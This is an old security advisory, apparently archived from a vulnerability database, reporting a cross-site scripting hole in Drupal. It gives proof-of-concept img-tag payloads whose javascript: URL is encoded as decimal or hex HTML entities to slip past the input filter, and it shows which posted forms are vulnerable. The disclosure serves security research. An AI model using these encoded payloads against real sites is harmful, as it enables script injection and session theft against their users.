Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:10864
HistoryJan 03, 2006 - 12:00 a.m.

drupal all versiyon xss

2006-01-0300:00:00
vulners.com
6

Drupal all versiyon xss

site:http://www.drupal.org

Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php

img tag : on


Decimal Value: HTML (without semicolons)

<img src=javascript:alert('XSS')> = <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41>

Decimal Value: HTML (with semicolons)

<img src=javascript:alert('XSS')> = <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>


example:
post message :<img src=javascript:alert('XSS')> not Vulnerable but <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41> Vulnerable

post mesage :<img src=javascript:alert('XSS')> not Vulnerable but <img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> Vulnerable


Credit:Liz0ziM
mail:[email protected]
www.biyo.tk , www.cehennem.org

Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyberlord and all friend


Source:

http://liz0zim.no-ip.org/drupal.txt


http://liz0zim.no-ip.org/drupal.txt


Get your free email from http://mymail.bsdmail.com